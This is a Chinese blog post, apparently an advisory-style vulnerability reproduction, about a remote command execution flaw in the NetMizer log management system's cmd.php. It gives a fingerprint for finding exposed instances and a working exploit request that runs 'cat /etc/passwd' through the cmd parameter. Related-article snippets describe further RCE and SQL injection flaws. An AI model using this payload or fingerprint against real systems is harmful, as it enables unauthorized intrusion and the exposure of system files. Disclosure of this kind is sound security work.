NetMizer 日志管理系统 cmd.php 远程命令执行漏洞(CVE-2025-0001)

已于 2025-03-16 11:49:27 修改
阅读量97 收藏
点赞数
分类专栏: 漏洞复现2025专题 文章标签: php 开发语言 web安全 安全 网络安全
于 2025-02-14 19:33:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shelter1234567/article/details/145640445
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

NetMizer 日志管理系统 cmd.php 远程命令执行漏洞

漏洞描述

NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行

威胁等级: 严重

漏洞分类: 远程命令执行

涉及厂商及产品:北京灵州网络技术有限公司 :NetMizer 日志管理系统

应用指纹及检出思路

匹配源代码接口 存在关键字NetMizer 即可

NetMizer 日志管理系统

icon: icon_hash="-759778190"

漏洞复现

GET /data/manage/cmd.php?cmd=cat+/etc/passwd HTTP/1.1
Host:

了解本专栏 订阅专栏 解锁全文 超级会员免费看
漏洞复现】NetMizer 日志管理系统 hostdelay.php 前台RCE漏洞复现
m0_71944965的博客
12-30 512
NetMizer日志管理系统hostdelay.php接口处存在命令执行漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令,获取服务器权限。
NetMizer 日志管理未授权访问+FTP登录
失心少年
08-04 380
北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。
NetMizer-日志管理系统-远程命令执行漏洞挖掘
2301_81383433的博客
03-25 395
NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行
NetMizer日志docker
xiaopeng_thriller的博客
05-25 328
今安装日志的时候发现给的是CENTOS 7 的日志但是灵州日志不支持,随后通过docker运行centos 6 灵州日志docker docker pull centos:centos6.6 //https://hub.docker.com/_/centos?tab=tags ,拉取docker镜像 docker image run -it -v /bakcdr:/home -p 8080:80 centos:centos6.6 /bin/bash // 将宿主机
NetMizer 日志管理系统 多处前台RCE漏洞复现
0xSec
02-15 1243
NetMizer 日志管理系统position.php、hostdelay.php、等接口处存在命令执行漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令,写入后门,获取服务器权限,进而控制整个web服务器。
NetMizer日志管理系统position.php命令执行
weixin_43567873的博客
03-08 121
NetMizer日志管理系统position.php命令执行
0day未公开NetMizer 日志管理系统dologin存在SQL注入漏洞
ZeroDay001的博客
02-15 208
NetMizer 日志管理系统dologin存在SQL注入漏洞 这是一个集内容管理与发布于一体的智能平台,广泛服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
NetMizer 日志管理系统dologin接口SQL注入漏洞复现
薛定谔嘚喵博客
02-15 451
NetMizer日志管理系统dologin接口存在SQL注入漏洞。未经身份验证的恶意攻击者利用 SQL注入漏洞获取数据库中的信息,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
NetMizer 日志管理系统前台RCE漏洞
故事讲予风听
05-30 1226
NetMizer日志管理系统是一个与NetMizer流量管理设备配合使用的外挂系统,通常安装在一台独立的Windows服务器上,NetMizer是提供集成应用交付和应用安全解决方案以实现业务智能网络的全球供应商。它为全球企业和运营商提供确保关键业务应用的全面可用性、高性能和完善的安全性的解决方案。
NetMizer-日志管理系统-登录绕过漏洞
2401_85578339的博客
03-25 257
NetMizer 日志管理系统存在登录绕过漏洞,通过限制某个请求包的发送获取后台权限。
漏洞复现篇——文件包含漏洞进阶-日志文件漏洞
爱国小白帽
02-19 1917
日志文件漏洞原理 当某个PHP文件存在本地包含漏洞,而却无法上传正常文件,这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。 Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中 例如:http://192...
日志管理系统
热门推荐
samson
06-26 3万+
.为什么需要日志管理系统 保留现场 自知者自明 所有即将发生的,都取决于已经发生的 数据商业化运作 1.1 日志管理系统的解决方案 机器上的日志实时收集,存储到日志中心 给日志建立索引,通过索引能很快找到日志 架设web界面,在web上完成日志的搜索 1.2 日志管理系统的困难 日志量很大,每天几十亿条 日志的实时收集,延迟控制在分钟级别 能够在线水平扩展 1.3 业内解决方...
wordpress迁移到Hostinger
s11show_163的博客
05-27 348
Wordpress搬家很多同学还是比较喜欢使用All in one wp migration插件,确实快速方便,但是有个缺点就是免费版只能导入500M以内的网站文件,对于更大的文件就需要付费pro版本才可以导入。而Migrate Guru这款插件则是可以高速搬迁最大200GB的文件,且支持无流量限制的网站迁移,完美解决大站点的搬家难题。在将要迁移到的服务器添加新网站,例如hostinger添加新网站,hostinger仪表盘-websites-websites list。
WordPress搜索引擎优化的最佳重定向插件:进阶指南
web_geek的博客
05-29 914
在网站优化的过程中,选择合适的重定向插件是提升SEO表现的重要一步。本文介绍了几款适合进阶用户的WordPress重定向插件,它们在功能、易用性和安全性方面各有优势。无论你是希望全面优化SEO,还是有特定需求,这些插件都能帮助你更好地管理网站链接,提升在搜索引擎中的排名。
火柴INIBOX专业矿机登场,碾压现有Initverse挖矿设备
metatime的博客
05-27 449
若生态落地加速,INI流通性与价值有望同步提升,为矿友们带来更好的收益机会。可以看到,同样的功耗,类似的价格,火柴INIBOX的算力是高性能CPU的1100多倍,电费成本降低90%以上,矿友们会怎么选择不言而喻,可以遇见的是,火柴INIBOX会快速淘汰传统CPU挖矿设备,成为INIChain挖矿专用设备。火柴INIBOX:算力850 MH/S±5%,465W±5%,每瓦算力高达1.7Mh/s,显著优于行业平均标准,静音设计(噪音<55分贝),体积仅196*165*125mm,完美适配家庭环境。
phpstudy(1) -- 记录
xflm的博客
05-27 600
记录一个小工具phpstudy
网络摄像机POE交换机选型指南:技术参数与场景适配深度解析
最新发布
suzhou_speeder的博客
05-29 605
例如,某学校监控系统初期部署12个摄像机,选用16口交换机既满足当前需求,又为未来4个点位扩展预留空间。而在分散的楼宇场景,建议采用多台8口/16口交换机分布式部署,缩短供电距离至≤100米,避免信号衰减。例如,某工厂监控系统采用光口交换机连接车间与监控中心,车间内使用电口交换机连接各摄像机,实现最优性价比。在某智慧城市项目中,通过三级组网架构实现全市监控系统覆盖:核心层采用万兆交换机,汇聚层部署千兆光交换机,接入层使用8口/16口电口交换机,既满足5000+摄像机并发接入需求,又实现毫秒级延迟控制。
优雅草最新实战项目技术Discuz X3.5电子签约插件开发项目实施方案优雅草·卓伊凡
一颗优雅草科技-央千澈的优快云博客~只想无穷无尽的学习~作息早8-晚8
05-27 1402
优雅草科技将为DiscuzX3.5系统开发电子签约插件,预算9,300元,工期35天。项目采用PHP7.4+e签宝SDK技术栈,实现合同发起、签署、模板管理等功能。包含UI设计、前端开发(响应式页面)、后端插件开发及文档培训。技术方案重点包括:集成e签宝API,新建签约记录数据表,开发后台管理界面,并确保与Discuz原生系统无缝集成。项目采用模块化开发,优先保障核心签约流程,提供3个月维护期。
NetMizer系列:深度解析与智能带宽管理技术白皮书
网优先锋(NetMizer)系列产品技术白皮书是由北京灵州网络技术有限公司发布,针对中国网络安全和网络管理领域的需求,提出了一套创新型的解决方案。该系列产品的核心在于深度内容分析、深层速率控制和智能会话管理等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值